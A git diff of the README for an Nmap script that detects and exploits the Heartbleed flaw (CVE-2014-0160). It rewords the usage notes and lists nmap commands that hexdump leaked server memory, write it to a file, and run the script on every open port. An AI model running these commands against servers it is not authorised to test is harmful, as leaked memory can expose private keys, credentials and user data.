takeshixx/nmap-scripts/README.md

 ## ssl-heartbleed-dump.nse

-Discovers/Exploits Heartbleed/CVE-2014-0160.
-This script is basically like the Heartbleed detection script included in [official Nmap repositories](https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse) with the ability to dump the leaked memory to an outfile or print a hexdump with Nmap debug output.
+Discovers/Exploits Heartbleed (CVE-2014-0160).
+This script is basically like the Heartbleed detection script included in [official Nmap repositories](https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse) with the ability to dump the leaked memory to an outfile or print a hexdump by increasing Nmap's debug output.

-#### Check if a host is vulnerable
-This runs on every SSL, FTP, SMTP and/or XMPP port.
+Check if a host is vulnerable to Heartbleed (checks every SSL-enabled HTTP, FTP, SMTP and/or XMPP port):

 ```
-$ nmap --script ./ssl-heartbleed-dump.nse host.tld
+$ nmap --script ./ssl-heartbleed-dump.nse 192.168.1.1
 ```

-#### Dump leaked memory from a vulnerable host
-Dumping leaked memory is enabled by increasing Nmap's debug level via -d flag.
+Print out a hexdump of leaked memory by increasing Nmap's debug level with the -d flag:

 ```
-$ nmap -d --script=./ssl-heartbleed-dump.nse host.tld
+$ nmap -d --script=./ssl-heartbleed-dump.nse 192.168.1.1
 ```

-#### Dump leaked memory into an outfile
+Dump leaked memory into an outfile:

 ```
-$ nmap --script ./ssl-heartbleed-dump.nse --script-args 'ssl-heartbleed-dump.dumpfile=/tmp/heartbleed.dump' host.tld
+$ nmap --script ./ssl-heartbleed-dump.nse --script-args 'ssl-heartbleed-dump.dumpfile=/tmp/heartbleed.dump' 192.168.1.1
 ```

-#### Run ssl-heartbleed.nse against every port
-Force the script to run on each port, regardless if the servie was detected or not.
+Run ssl-heartbleed-dump.nse against every open port, regardless if the servie was detected or not:

 ```
-$ nmap --script +./ssl-heartbleed-dump.nse host.tld
+$ nmap --script +./ssl-heartbleed-dump.nse 192.168.1.1
 ```